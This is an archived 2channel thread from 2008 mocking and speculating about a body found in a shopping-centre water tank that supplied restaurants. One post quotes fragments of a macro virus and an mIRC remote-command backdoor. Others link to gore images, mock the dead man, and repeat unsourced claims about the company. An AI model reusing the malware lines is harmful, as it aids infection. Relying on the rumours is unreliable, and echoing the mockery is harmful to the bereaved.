2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【社会】 "ショッピングセンターの受水槽に遺体、その水が飲食店に?"で、イオン「でも検査はクリア。全て消毒した」…深まる謎★6

1 :☆ばぐ太☆@☆ばぐ太☆φ ★:2008/12/03(水) 13:29:50 ID:???O
★SC受水槽に男性遺体 その水を飲食店に供給していた!

・松阪市のイオン系ショッピングセンターの屋外受水槽から、11月27日に男性遺体が発見された。
 「夕刊三重」によれば、男性が飛び降り自殺を図り、水槽天井を突き抜けて水中に落ちた可能性が
 高いほか、この男性は11月1日から行方が分からなくなっていたという。
 ショッピングセンターには10店舗を超える飲食店が入居していることもあり、ネット上で様々な憶測を呼んだ。

 「ひと月近くも、この水を使用していたことになる」「客が死体水飲んだのなら精神的苦痛は計り
 知れない」といった書き込みが相次ぎ、騒動に発展。

 イオン広報は事件があったことを認めているが、遺体がどれだけ受水槽に存在していたかに
 ついては「警察の捜査中で、お話する立場ではない」としている。ただ、「3か月おき」「1か月おき」「毎日」の
 点検を行っており、10月27日に受水槽の清掃と点検、11月8日に3か月おき点検を行ったという。
 受水槽の水は、事件発覚までの11月中に飲食店などの給水設備に使われたが、「法令上、飲み水
 として問題がなかったということを確認している」(同社広報) としている。
 また、通報を受けた松阪農林商工環境事務所も「残留塩素検査が毎日行われていることを確認
 しており、水質的に問題ない状態だった」としている。
 都内のある保健所職員は「遺体といった有機物が受水槽に入れば、塩素量が減っていることに
 気づくはず。水質検査に引っかからないはずはない」と話しており、なぜ水質に問題がないという
 ことになったのか、謎は深まるばかりである。(抜粋)
 http://www.j-cast.com/2008/12/02031365.html

※マームのお知らせより抜粋
・11月27日、一部報道のとおり給水施設内において死亡事故が発生しました。当日水質検査を
 実施した結果水質基準に適合していることを確認いたしました。また事故発生後、
 速やかに上水道の使用を中断し、配管、調理場など水を使用する器具類すべてについて点検、
 洗浄、消毒を実施しました。
 ttp://www.matsusaka-marm.com/oshirase/081203.html

※前:http://mamono.2ch.net/test/read.cgi/newsplus/1228271558/

2 :名無しさん@九周年:2008/12/03(水) 13:30:22 ID:ye1CTz7r0
■2ちゃん敏腕「記者」 「ばぐ太」って何者だ
ttp://www.j-cast.com/2006/11/23003923.html

この「ばぐ太」さんは、J-CASTニュースの記事を元にスレッドを立てることが非常に多いとされており、(※注)
「マスコミ板」には、
  「ばぐ太だけがどういうわけか狂ったようにスレを立てて編集長も黙認。
  この二人つるんで買収されてるんじゃね? ひろゆきどうにかしてくれ」
  「j-castの商法を見る限り、2chをいかに商売の種にするかという思惑が全てのような状態ですから、
  2ch記者に工作員を送り込むか、もしくは個別に工作員にメールで連絡して、
  スレ一つ立てるごとにいくら払うとかの秘密契約結んでる可能性すらあると私は睨んでおります」
といった書き込みも散見される。
(※注)頻出ソース:8月は、ぶっちぎりで首位(どの記者も立てるYahoo!を除いて)
*8月 http://s02.megalodon.jp/2008-0831-2359-04/hager.imo256.net/redactors/sources/15
10月 http://s01.megalodon.jp/2008-1031-2358-55/hager.imo256.net/redactors/sources/15
今月 http://hager.imo256.net/redactors/sources/15

○上記ソースで立ったスレの過去ログ
【ネット】 2ちゃんねる記者「ばぐ太」って何者だ?!
http://dexi.sytes.net/log/read.php/newsplus/1164261047/1-9999
【ネット】2ちゃんねる記者「ばぐ太」って何者だ?! 何故お好みなのか不明だとJ-CASTニュース
http://dexi.sytes.net/log/read.php/newsplus/1164268448/1-9999
【ネット】 2ちゃんねる記者「ばぐ太」って何者だ…「買収されてる」「工作員」疑惑も★3 ←ばぐ太自身が立てた
http://dexi.sytes.net/log/read.php/newsplus/1164345606/1-9999
【ネット】 2ちゃんねる記者「ばぐ太」って何者だ…「買収されてる」「工作員」疑惑も★4
http://dexi.sytes.net/log/read.php/newsplus/1164384029/1-9999
○関連スレ
【炎上メディア】J-CASTニュース vol.2【コピペ記者】
http://society6.2ch.net/test/read.cgi/mass/1210865168/
【2ch脳】ブロードバンドウヨ電波・J-CASTの怪
http://namidame.2ch.net/test/read.cgi/seiji/1190256954/
ばくた(ばぐ太)←コイツ何者?
http://anchorage.2ch.net/test/read.cgi/siberia/1143420523/

3 :名無しさん@九周年:2008/12/03(水) 13:30:28 ID:8i8d68EX0
死体水・・・・・・・・・・

4 :名無しさん@九周年:2008/12/03(水) 13:31:01 ID:049tKLk70
うげええ

5 :名無しさん@九周年:2008/12/03(水) 13:31:32 ID:wXSMtIkt0
クリアーな検査だったんだな

6 :名無しさん@九周年:2008/12/03(水) 13:32:38 ID:3SreHMhz0
http://www.matsusaka-marm.com/image/xmas/main-christmas.jpg
>マームに舞い降りた、クリスマス。




昔 となりのおしゃれなおねえさんは
ジャスコの日 私に云った
今夜 8時になれば サンタが店にやってくる

ちがうよ それは絵本だけのおはなし
そういう私に ウィンクして
でもね 大人になれば あなたにもわかる そのうちに

ご遺体がサンタクロース
だし汁はサンタクロース 腐敗汁を溶かして
ご遺体がサンタクロース
中年のサンタクロース 水道管から来る

ご遺体がサンタクロース
だし汁はサンタクロース 受水槽突き抜けて
ご遺体がサンタクロース
中年のサンタクロース 私の口に入る

7 :名無しさん@九周年:2008/12/03(水) 13:32:56 ID:SOv8goDl0
店を利用した人達は、この事実を知りたくは無かっただろうな

8 :名無しさん@九周年:2008/12/03(水) 13:34:23 ID:UxtvMftM0
   /::::::::::::::::::::::::::::::; :;:::"'    ┌────────────┐
  /:::::;;:::::::::::::::::::::::::;;;ノ ヽ;:::\  │ イオングループは死体水で .│
 /::::::::ノ""'''''‐‐-‐'''"    ヽ:;::| <  お客様感謝デー!     .│
 |::::::::::|              .|ミ|  .└────────────┘
 |::::::::::|              .|ミ|
 |::::::::|    ,,,,,,, ノ ヽ,,,,,   |ミ|    イオン社長の実弟、
  |彡|.  '''"""    """'' .|/      岡田克也さん (民主党第4代代表)
 /⌒|  -=・=‐,   =・=-  |
 | (    "''''"   | "''''"  |
  ヽ,,         ヽ    .|
    |       ^-^     |     松阪マームの受水槽から遺体まとめ
   |     -====-   |        http://marmsuiso.client.jp/
    \.    "'''''''"   /
   |. \ .,_____,,,./::\  J-CAST・ SC受水槽に男性遺体 その水を飲食店に供給していた!
/     ゙ヽ   ̄、:::::  ゙l,       http://www.j-cast.com/2008/12/02031365.html



  〜〜〜〜〜 国民生活第一! イオン死体水還元システム 〜〜〜〜〜〜〜〜〜

                ┏━━━━┓
                    ┏╋ 死体水 ┃ 松阪ショッピングセンター マーム
.         高置水槽┃┗┳━━━┛  ...│   ttp://www.matsusaka-marm.com/
                    ┃┌╂─────┐│
                    ┃│┣┓(゚д゚)ウマー. │├1F〜3F
    遺体入り受水槽 .┃├╂─────┤│ ジャスコ松阪店 ttp://www.aeon.jp/jusco/matsuzaka/
..            ↓     ┃│┣┓(゚д゚)ウマー. ││
          ┏┛┗┓  ┃├╂─────┤│
        ┏╂.or┐┨ .┃│┗┓(゚д゚)ウマー. │└1Fフードフロア ttp://www.matsusaka-marm.com/food.html
水道━回┛┗┳┳┻圄┛└──────┘   ロッテリア、サイゼリヤ、スガキヤetc
本管 メーター       ポンプ


9 :名無しさん@九周年:2008/12/03(水) 13:35:04 ID:OUHx2BoL0
なんとかイオン水

10 :名無しさん@九周年:2008/12/03(水) 13:36:19 ID:tIJMpxY/0
検査クリアなら消毒はいらないはずなんだけどね
洗浄はともかく

11 :名無しさん@九周年:2008/12/03(水) 13:36:24 ID:HKDdR2Vg0
ああ、これがなんとか還元水って奴か

12 :名無しさん@九周年:2008/12/03(水) 13:37:06 ID:C4n+XW190
もうみんな忘れようとしているのに

13 :名無しさん@九周年:2008/12/03(水) 13:39:05 ID:iaAcNnaiO
英断スバラシイ
広報遅かったが好感度はアップした

俺は行かないが

14 :名無しさん@九周年:2008/12/03(水) 13:39:05 ID:hOxGa8RqO
イオンのPB水ですね

15 :名無しさん@九周年:2008/12/03(水) 13:39:56 ID:w+LamAQs0
で?
これTVのニュースでやったの?
情報弱者にはこのままなかった事になるの?

16 :名無しさん@九周年:2008/12/03(水) 13:40:18 ID:U3y5K9EZ0
  /'           !   ━━┓┃┃
-‐'―ニ二二二二ニ>ヽ、    ┃   ━━━━━━━━
ァ   /,,ィ=-;;,,, , ,,_ ト-、 )    ┃               ┃┃┃
'   Y  ー==j 〈,,二,゙ !  )    。                  ┛
ゝ.  {、  - ,. ヾ "^ }  } ゚ 。
   )  ,. ‘-,,'   ≦ 三  
ゞ, ∧ヾ  ゝ'゚       ≦ 三 ゚。 ゚
'=-/ ヽ゚ 。≧         三 ==-
/ |ヽ  \-ァ,          ≧=- 。
  ! \  イレ,、         >三  。゚ ・ ゚
  |   >≦`Vヾ        ヾ ≧
  〉 ,く 。゚ /。・イハ 、、     `ミ 。 ゚ 。 ・

17 :名無しさん@九周年:2008/12/03(水) 13:40:23 ID:2XfrVrPy0
手首ラーメンを超えたな。

18 :(゚ω ゚) ◆JosoBYcWOU :2008/12/03(水) 13:40:23 ID:1hB4pPdG0 ?2BP(556)
シャレになんねーニュースだな…朝からキツイわ
被害者のご冥福をお祈りします


19 :名無しさん@九周年:2008/12/03(水) 13:40:30 ID:gWRWKeVq0
今気付いた

マームって、ナウシカにでてたような・・・


















オーマだったorz

20 :名無しさん@九周年:2008/12/03(水) 13:41:34 ID:Id09OPau0
腐乱死体還元お客様サービスデイ
死体還元天然イオン水・無料サービス  死体還元天然イオン水・無料サービス
死体還元天然イオン水・無料サービス  死体還元天然イオン水・無料サービス
死体還元天然イオン水・無料サービス  死体還元天然イオン水・無料サービス
死体還元天然イオン水・無料サービス  死体還元天然イオン水・無料サービス
水槽の死体は始末したので安心してご利用ください。

21 :名無しさん@九周年:2008/12/03(水) 13:41:34 ID:nZsPzGy90
週刊誌が警察に行って死亡推定日時聞き出せば一巻の終わりだよね.

マスゴミなんでやらないの?

赤福、不二家、吉兆より酷いよねこれ.

22 :名無しさん@九周年:2008/12/03(水) 13:41:50 ID:FTMYla8J0
Jcast
http://www.j-cast.com/2008/12/02031365.html
Yahoo
http://headlines.yahoo.co.jp/hl?a=20081202-00000003-jct-soci
BIGLOBE
http://news.biglobe.ne.jp/social/jc_081202_6504433660.html
nfoseek
http://news.www.infoseek.co.jp/topics/society/n_dead_body__20081202_3/story/20081202jcast2008231365/
excite
http://www.excite.co.jp/News/society/20081202/JCast_31365.html
Livedoor
http://news.livedoor.com/article/detail/3923967/
newsing
http://newsing.jp/entry?url=www.j-cast.com%2F2008%2F12%2F02031365.html

23 :名無しさん@九周年:2008/12/03(水) 13:41:51 ID:EBV7PtLj0
>>15
これTVでやったら、一番喜ぶのは中国共産党だな。

24 :名無しさん@九周年:2008/12/03(水) 13:42:07 ID:23qtDmyW0
985 名無しさん@九周年 New! 2008/12/03(水) 13:37:40 ID:oYtXIXho0
管理の悪いマンションだと受水槽にホームレスが忍び込んで行水しているよ・・・・・



((( ;゚Д゚)))ガクガクブルブル

25 :名無しさん@九周年:2008/12/03(水) 13:42:26 ID:zM2yh48u0
アルカリイオン水
有下痢遺怨水

26 :名無しさん@九周年:2008/12/03(水) 13:42:26 ID:C+FmcXS90
地元のニートどもは記者になって取材しろ


〈編集パート急募〉

夕刊三重編集局では新聞製作の補助スタッフを募っています。
編集、取材、編集企画(デザイン)に興味がある18歳から30歳ぐらいの男女で学生でも可。
曜日、時間など委細は面談のときに。希望者は電話して下さい。

   (株)夕刊三重新聞社
     松阪市外五曲町15
     電話0598(21)6113(代)

27 :名無しさん@九周年:2008/12/03(水) 13:42:28 ID:4321xtW10
「は。水とは?おいしい水のことですか?」
「ええ。その件では皆様にご迷惑をおかけしております」
「今回の件(腐乱死体イオン水)に関しては何も報告を受けておりません」
「東海テレビと中日はこのことを知ってる」
「報道されないのは何故か解りません」
「もうマスコミは取り上げないと思いますよ」
「前後の水の安全調査はしてあるので健康には危害はありません」
「独自の水質検査で異常がなかったので、大丈夫」
「心配なら自分で血液検査を受けて下さい」
「きちんと検査を行い清掃した」
「受水槽は洗浄ではなく単に水を入れ替えただけ」
「水道管はそのままなのでパイプ内に異物が残留している可能性はゼロではないが
水質基準はクリアしているので安心して御飲食ください」
「返金には応じないことになっている」
「こちらは健康被害なし、水質問題ないと聞いてるので返金も出来ない。」
「保健所から水質問題ないと聞いてるので返金も出来ない」
「文句があるならマームの管理会社に言ってください」
「この事実を公表する予定は無い」
「補償請求するなら訴訟してもらってもいい」
「文句があるなら裁判起こせばいいでしょ」
「訴訟を起こしてもらってもいい」
「どうぞ、好きにしてください」
「あなたに説明する必要はないと思います」

n:       ___      n:
||    / __ \    .||
||    | |(゚)  (゚)| |    ||
f「| |^ト    ヽ  ̄ ̄ ̄ /   「| |^|`|
|: ::  ! }      ̄□ ̄     | !  : ::}
ヽ  ,イ  / ̄イオン ̄\  ヽ  ,イ
      汚客様相談室
http://marmsuiso.client.jp/totu.html

28 :名無しさん@九周年:2008/12/03(水) 13:43:15 ID:gX1WdFdW0
ゲェェェ
     ∧_∧
    (ill´Д`)
    ノ つ!;:i;l 。゚・
   と__)i:;l|;:;::;:::⊃
    ⊂;::;.,.';;;;'::.:.;::.⊃

29 :名無しさん@九周年:2008/12/03(水) 13:43:19 ID:fAX/1vLfO
水質検査して問題ないなら大丈夫だよ!
普段だって糞尿を濾した下水のんでるんだし気にしたらダメ!

30 :名無しさん@九周年:2008/12/03(水) 13:43:31 ID:w3eK0Ueq0
この一連のスレで思ったのは、ハムスターお爺さんが殺された事件を
知らない人が多いって事。
三重イオン系三大事件として覚えて欲しい。

31 :名無しさん@九周年:2008/12/03(水) 13:43:44 ID:BZJTftpx0
新情報キタ!
http://omanchin.com/honten-salon.cgi/vlphp222811.jpg

32 :名無しさん@九周年:2008/12/03(水) 13:43:45 ID:rwGvulvI0
TVで報道されないからって
全国イオンのトイレや駐車場にビラ忘れたらだめだよ

33 :名無しさん@九周年:2008/12/03(水) 13:44:06 ID:SXx3aTpH0
( ^ω^)腐っ腐〜♪

34 :名無しさん@九周年:2008/12/03(水) 13:44:08 ID:Nplm3fTC0
そこらのガキの大小便や、もっといっぱいの腐れたブツが浮いてる海や川の水を
そのままコップに注いで来客者に飲ませ
そのまま調理に使って料理を客に出していて、それが発覚した後、

問題ありませんがなにか?????

と言い、営業を続ける店の姿勢を糾弾してんだよ!
それが全国的に有名な店だから尚更だ。

マームの企業倫理は
親指スープに突っこんで出されて、「汚いじゃないかっ!」て言った客に、
「手を洗ってるから問題ないすっよ」と言いかえすラーメン屋以下。

35 :名無しさん@九周年:2008/12/03(水) 13:44:10 ID:jrU5vW8L0
忘年会シーズンだってのに

帰りの電車でこれ思い出さないようにしよう……

36 :名無しさん@九周年:2008/12/03(水) 13:44:17 ID:hVNOxdoT0
歯医者には貼り紙の類はないのか?

37 :(゚ω ゚) ◆JosoBYcWOU :2008/12/03(水) 13:44:23 ID:1hB4pPdG0 ?2BP(556)
松阪マームの受水槽から遺体まとめ
ttp://marmsuiso.client.jp/

38 :名無しさん@九周年:2008/12/03(水) 13:44:39 ID:krkQ/api0
岡田様謝罪デーはいつですか?

39 :名無しさん@九周年:2008/12/03(水) 13:44:39 ID:EBV7PtLj0
592 +2:名無しさん@九周年 ::2008/12/03(水) 12:42:02 ID: GyO2wM7i0 (1)
  >>572
  先月、名古屋タイムズが廃刊に追い込まれたんだけど、
  この事件を報道させないためだったんだろうか?

961 +1:名無しさん@九周年 ::2008/12/03(水) 13:33:53 ID: AhkKdig40 (1)
  >>592
  名古屋タイムズは以前、労働局の裏金問題をすっぱ抜いたことがあるよ。
  出入りの中日新聞の記者が
  「先に教えてくれたら、記事にしないよう圧力をかけてやったのに!」と
  残念そうに話していたと、当時そこで働いていた親から聞いたので
  名古屋市の裏金がどうこうと、中日新聞が今更書き立てるのを見て笑いが止まらない。

971:名無しさん@九周年 :sage:2008/12/03(水) 13:35:44 ID: gWRWKeVq0 (20)
  >>961
  名古屋タイムズ本社がチュン日新聞本社近くにあるしね

40 :名無しさん@九周年:2008/12/03(水) 13:44:46 ID:gWRWKeVq0
>>32
ああ、そうだな

間違ってもファックスで流したり、画像掲示板に間違ってチラシ貼り付けたり
してはダメだな

41 :名無しさん@九周年:2008/12/03(水) 13:44:47 ID:zszA29Mi0
302 名前:可愛い奥様 本日のレス 投稿日:2008/12/03(水) 11:38:23 mPCjOvcJ0
マームに電凸しました
管理部長のYさんに電話を転送されましたが
「「今回の件はすべて本社が対応するので本社のコーポレイトコミニケーション部(広報部)に電話してくれ」
と言われてしまいました

(株)イオン本社コーポレイトコミニケーション部(広報部)
TELO43-212-6O61

結果はまた報告します

------------------------------------

という話なんだが、本社の指示決定があったことをいよいよ認めたってことだよな。
まあ元々一店舗で方針決定できる問題のはずがなかったんだから、隠蔽について
本社の指示があったのは間違いないとは思っていたが。

42 :名無しさん@九周年:2008/12/03(水) 13:44:53 ID:62qS+31C0
>>30
三大って、ハムスターおじいさんと、これと、あともう1つは何?

43 :名無しさん@九周年:2008/12/03(水) 13:44:57 ID:sP/VIVgT0
この問題は結果的に隠蔽するしかなかったと思う。
(融通が利かないという意味で)大きな組織で働いた人間なら、嫌悪感とは別になんとなく理解できると思う。
誰か個人や企業が悪意を持って隠蔽できる状況じゃなかった。

テナント、マーム、イオン、マスコミ、自治体と発表で不利益をこうむる関係者が多すぎて
「誰も動けない」状況だったんでしょう。

こんな誰の責任でもない話、発覚して数日で関係者の意識あわせなんて無理。

「たぶん全員死ぬ(売り上げが致命的に、永続的に激減、または廃業)けど、どうする?」
「・・・。」

誰もが、事情を公表できた。
でも「自分が動けばみんなが即死」状態で、
動ける奴なんていない。

しかも動いた奴が責任を追及され一番長く苦しんで死ぬ。

そして時間が経過すれば、おのずと施設側である
マーム(イオン)に責任が集中していく。

そして同じことが、マームの組織の中、個人レベルで起こっていたのでしょう。

全員ゆっくりと死ぬことが確実な状況なら
全力で「自分がみんなを殺す引き金となる責任」から逃れようとする。

その意識が集まって「隠蔽」という結果になった。

マームは気の毒に思うが、あえて言おう。

「苦しんで死になさい」

44 :名無しさん@九周年:2008/12/03(水) 13:45:14 ID:oVG98lkP0
>>27
>都内のある保健所の職員は
>「遺体といった有機物が受水槽に入れば、塩素量が減っていることに気づくはず。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>水質検査に引っかからないはずはない」と話しており、
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>なぜ水質に問題がないということになったのか、謎は深まるばかりである。


3択問題です。

1:水質検査なんかやってないもん!
2:検査したけど数値は適当だもんね!
3:検査したけど検査器具壊れてるんだ!

45 :名無しさん@九周年:2008/12/03(水) 13:45:22 ID:MWmefux60
>>30
とりあえず、釣られてみる
残りの1つは何?kwsk

46 :名無しさん@九周年:2008/12/03(水) 13:45:41 ID:0xGxGQDs0
466 名前:名無しさん@九周年[sage] 投稿日:2008/12/02(火) 21:54:22 ID:oKGJVgtn0
>>389
 元祖まとめサイト
 ttp://marmsuiso. client.jp/

 松阪マーム受水槽事件騒動まとめ 
 ttp://www.saira .jp/society/SOCIE20081202001.php

 ttp://enq-maker .com/gMhjxk
 アンケート:松阪マーム受水槽事件騒動について

47 :名無しさん@九周年:2008/12/03(水) 13:45:53 ID:zM2yh48u0
>>27
汚遺死い水

48 :名無しさん@九周年:2008/12/03(水) 13:46:02 ID:B6guNR8i0
知らない方がいい事もあるさ。
周辺住民や何も知らされてなかった従業員の事を考えると
あながちイオンの対応も間違ってない。
水を飲んでしまった人の気持ちも考えようぜ・・・


49 :名無しさん@九周年:2008/12/03(水) 13:46:25 ID:gm8SLJNu0
     / ̄ ̄ ̄ ̄\
     l\_____)
     l         ..l
   / \_ぢゃすこ_l
  /      ̄ ̄ ̄ノ ヽ\
 /   ノ""'''''‐‐-‐'''"    ヽ|
 |   |             |ミ|  いらっしゃいませぇ〜
. |   /            |ミ|  >>16お客様。店内ではお飲みになられた水を
 |  |   ,,,,,    ,,,,,    |ミ|    噴き出さないでください。
  |彡|.  '''"""''   ''"""'' ..|/
 /⌒|  -=・=‐,   =・=-  |
 | (    し'''"   | "'し'  |
  ヽ,,         ヽ    .|
    |  ヽ    ^.-^  ノ .|
  /|     ‐-===-  ..|
/\..|\    "'''''''"   ./ヽ
\ \\\____,,,./l\\
 λ λ\.____/  | | \
   |  |    /\    | |  \
   |  |  .../\/\   | |   ヽ
   |  \/  ..人  \/  |    |
..  |    ̄ ̄ ̄ ̄ ̄ ̄    |    |
..  |    いよんぢゃすこ  |    |


50 :名無しさん@九周年:2008/12/03(水) 13:46:35 ID:YzhS8V4c0
↓ここから「工作員乙」「単発乙」「隠蔽がどうたら」と延々と熱いレス合戦が始まります!ご期待下さい

51 :名無しさん@九周年:2008/12/03(水) 13:46:36 ID:mleUILWE0
  「\
  丶 )   /~)
  / /   ( /
  / /    ||
 ( \   ||
  \ \  / |
   \ 丶/ /
__|   /_____
    ^^^^^^   (水槽)
  

           < 1乙

52 :名無しさん@九周年:2008/12/03(水) 13:47:00 ID:v3OmAfR60
      _ i'i,,,/7-、,_
     ヾ、゙ヽ ゙' '/彡
     =ミ ,、、_i i,L,_'゙=i-、
   ./'゙彡r|, ニt /-ミ'  ゙l,
  ,,/  .,゙''i、l'=''(・)j)ノ゙ i  i、_ <さぁ俺を飲んでくれ
  '1--、| l,゙l'rェェ,.l゙j゙./゙⌒ヽミ   水質的に問題ないから
  l゙i i .n i;ヽヾ'=|'゙/゙/i゙/!j゙!ji゙
  Yt'‐リ゙'゙´ ゙ヽ‐|'゙ ´゙゙.i、,_ノ
  .|N'゙rエニニlニコニニ'l、,
  r'゙´`゙'=;、,,、,、---、ゞ'゙ ゙ゝ
  ヽ,_r゙'L,_     `゙'>゙`〉
  r‐'''゙ _,)     i‐'゙ ぐ_
  .゙ヾ-'゙       ゙\ 、ろ
              ゙ー゙´

53 :名無しさん@九周年:2008/12/03(水) 13:47:07 ID:ujjlJ68a0
0才児がイトーヨーカドーでキチ外にあたま刺されて殺された事件は
結構連日報道されて、ヨーカドーが悪く言われてたけど、
イオングループはさすがだね。ガードの硬さが違う。

54 :名無しさん@九周年:2008/12/03(水) 13:47:20 ID:2J1wn8VY0
もう死んでいーおん

55 :名無しさん@九周年:2008/12/03(水) 13:47:25 ID:C80OhgeA0
なかなか笑えるね

ttp://www.aeon.info/aboutaeon/aeon_code_of_conduct/002.html


56 :名無しさん@九周年:2008/12/03(水) 13:47:29 ID:L+3rWS+m0
消化吸収された腐乱死体は僕たちとともに生きる!!

57 :名無しさん@九周年:2008/12/03(水) 13:47:56 ID:SIR2nG+Z0
水質検査 消毒してすむ問題ではないと思うが・・・・

58 :名無しさん@九周年:2008/12/03(水) 13:48:36 ID:lpWr4OMt0
>>48
でも、バレてしまった(特にネットで)からには
早急に事実を公表するのが正しい危機管理

59 :名無しさん@九周年:2008/12/03(水) 13:49:07 ID:OvowJ8fkO
( ^ω^ )腐っ腐〜♪






水死体画像
http://poetry.rotten.com/simmer/simmer2.jpg
http://y-bbs.net/kyoufu/guro/img/11942392550042.jpg

60 :名無しさん@九周年:2008/12/03(水) 13:49:23 ID:mleUILWE0
>>53

  「\
  丶 )   /~)
  / /   ( /
  / /    ||
 ( \   ||
  \ \  / |
   \ 丶/ /
__|   /_____
    ^^^^^^   (水槽)
  

           < イオンの中の人が報道させたんじゃない?

61 :名無しさん@九周年:2008/12/03(水) 13:49:49 ID:MCic+haz0
>>59 これはおいしそうなシチューおじさんでつね

62 :名無しさん@九周年:2008/12/03(水) 13:49:51 ID:1AJWOTAs0
イオンも、テレビ局も、黄柳野高校も

結局、金儲け

63 :名無しさん@九周年:2008/12/03(水) 13:49:51 ID:vs07D5TsO
…みんなのなかでおれはいきているんだよ
40代 男性

64 :名無しさん@九周年:2008/12/03(水) 13:49:52 ID:w+LamAQs0
>>23
逆じゃねーの?
イオン系は中国様に工場持ってるし

65 :名無しさん@九周年:2008/12/03(水) 13:50:03 ID:vo1lULN+0
>>12
そもそも知らなかった人のほうが多いんだが?

66 :名無しさん@九周年:2008/12/03(水) 13:50:10 ID:rwGvulvI0
ハムスタおじいさん同様にいつかWIKIに載るな。

67 :名無しさん@九周年:2008/12/03(水) 13:50:19 ID:QdWEyJRlO
擁護してもムダってことが理解出来ない時点でピヨってる

68 :名無しさん@九周年:2008/12/03(水) 13:50:44 ID:Qz1FLifU0
カップルが観覧車に20分閉じ込められたぐらいでスポーツ新聞に載るというのにこの国はwww

69 :名無しさん@九周年:2008/12/03(水) 13:50:58 ID:whN5LjrJO
>>19
それはオーム(王蠱)

70 :名無しさん@九周年:2008/12/03(水) 13:51:00 ID:krkQ/api0
遺体に善玉菌が繁殖していれば、それを飲んだ人は「ヒト由来の乳酸菌」で健康になってるかも。

でも大腸菌が大部分なんだろうな。

71 :名無しさん@九周年:2008/12/03(水) 13:51:04 ID:aZeydn6F0
ジャスコも正直にあったことを言って、配管工事に
さっさと取り掛かったら年末を一回棒に振るだけで
済んだのに。
今更しょうがないけど11月中のレシート持って
来たら無料で身体検査ぐらいのフォローはするべき。

72 :名無しさん@九周年:2008/12/03(水) 13:51:11 ID:CWFn+5jR0
腐敗液入りの料理で気づかないなんて舌バカにもほどがあるねw

73 :名無しさん@九周年:2008/12/03(水) 13:51:17 ID:aACLhf7m0
●マームよりお知らせ●

当店の水道水に中年男性の死体が入っておりましたが、

(いつから死体が入っていたかはよく判りませんが)

発見後すぐに水質検査を行いました結果、健康に問題はございませんので、

安心して死体の入っていたお水をお使いください。


■今まで死体水を使用していた食品

ロッテリアのドリンク全種
スガキヤのラーメンスープ
サイゼリヤのパスタ
さぼてん、あづま、ザ・どん、コケコッコー共和国の白米
店内設置のカップドリンク販売機
おいしい水自動販売機
店内販売のお惣菜各種

■今まで死体水を使用していたサービス

マーム歯科医院
エステティックサロン エックスハート
美容室 ユーゾー
女性専用フィットネス カーブス


※なお、返金はいたしません。謝罪もいたしません。



74 :名無しさん@九周年:2008/12/03(水) 13:51:21 ID:RYMlKHwmO
例え無害だとしても伊藤ハムの地下水汚染よりダメージ大きい様な…wメディアへの隠蔽圧力醜過ぎ!人づて噂の怖さを知らないな…未来永劫に都市伝説化すると思う。

75 :名無しさん@九周年:2008/12/03(水) 13:51:32 ID:CEPxOCbEO
水じゃなくダシと思えば儲かった気分だろう

76 :名無しさん@九周年:2008/12/03(水) 13:51:33 ID:EBV7PtLj0
近年希に見る良スレじゃ
感動した

77 :名無しさん@九周年:2008/12/03(水) 13:51:34 ID:SXx3aTpH0
>>69
オーマ=巨神兵の名前

78 :名無しさん@九周年:2008/12/03(水) 13:52:00 ID:YzhS8V4c0
148 あんず(愛知県) New! 2008/12/03(水) 13:45:22.16 ID:Sq84r7Ck
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

これ何?

79 :名無しさん@九周年:2008/12/03(水) 13:52:14 ID:gm8SLJNu0
寂れた店みたいだから少しの売り上げも欲しかったんだろ。


80 :名無しさん@九周年:2008/12/03(水) 13:52:41 ID:1AJWOTAs0
マスコミを脅したら?
そしたら、普通事件になるから

脅した理由をそこで説明



そうなった場合マスコミは放送するんかな〜

81 :名無しさん@九周年:2008/12/03(水) 13:52:44 ID:oYtXIXho0





先月スガキヤでラーメンセット食べたんだけど
ラーメンにフカヒレの欠片みたいなものが入っていたんだよね
口に入れて噛んでみるとクニュクニュして食感はいいしスープの味がしみこんで旨いと思ったんだけど
今思えばあれは・・・・・・・・


((( ;゚Д゚)))ガクガクブルブル


おかげでラーメンというか汁物が喰えなくなりました




82 :名無しさん@九周年:2008/12/03(水) 13:52:58 ID:mleUILWE0
>>78
良スレ認定です。

そのスレは良スレと判断されました

83 :名無しさん@九周年:2008/12/03(水) 13:52:59 ID:Uh9QMMwa0
死体でダシとるとコクがあって美味しいらしいよ

84 :名無しさん@九周年:2008/12/03(水) 13:53:13 ID:S79ofrDA0
流出した血液より、損傷の程度によっては、脳や臓器の微細な断片が
ストレイナーの荒い金網を抜けて入り込むことの方が問題
多分透明なコップを日光で透かしてみて、少し半透明な埃のようなものが
2-3目視できる程度だと思うが
紙コップや、薄くても色のついたコップを蛍光灯の下で見ている分には
まったく判らなかっただろうと思う

遺体の損傷程度と、いつ飛び込んだのか
この二つが判らないと不安を打ち消すこともできない

85 :名無しさん@九周年:2008/12/03(水) 13:53:22 ID:YJ2uQjjN0
穢れた給水設備と配管、水を使った調理器具の全て取り替えろ
その後伊勢神宮の神主さんにお清めの神事をしてもらうまで営業停止

  最低限これくらいはな

86 :名無しさん@九周年:2008/12/03(水) 13:53:28 ID:YzhS8V4c0
>>82
そういう意味なのかw

87 :名無しさん@九周年:2008/12/03(水) 13:53:30 ID:Nplm3fTC0
>>43
隠蔽するしかないのは、ここにしか会社がないマームにしてみればそうかもしれないが、
他の、スーパーや飲食店など、全国チェーンの店にしてみれば、
食の安全に対する姿勢が、

親指スープに突っこんで出されて、「汚いじゃないかっ!」て言った客に、
「手を洗ってるから問題ないすっよ」と言いかえすラーメン屋以下

だと思われることは、ブランド的に大打撃。
マーム店を潰しても、食の安全に敏感ですという姿勢をとるべきだったよ。

88 :名無しさん@九周年:2008/12/03(水) 13:53:34 ID:Id09OPau0
死体還元天然イオン水 死体還元天然イオン水 死体還元天然イオン水 死体還元天然イオン水
死体還元天然イオン水 死体還元天然イオン水 死体還元天然イオン水 死体還元天然イオン水
死体還元天然イオン水 死体還元天然イオン水 死体還元天然イオン水 死体還元天然イオン水
死体還元天然イオン水 死体還元天然イオン水 死体還元天然イオン水 死体還元天然イオン水
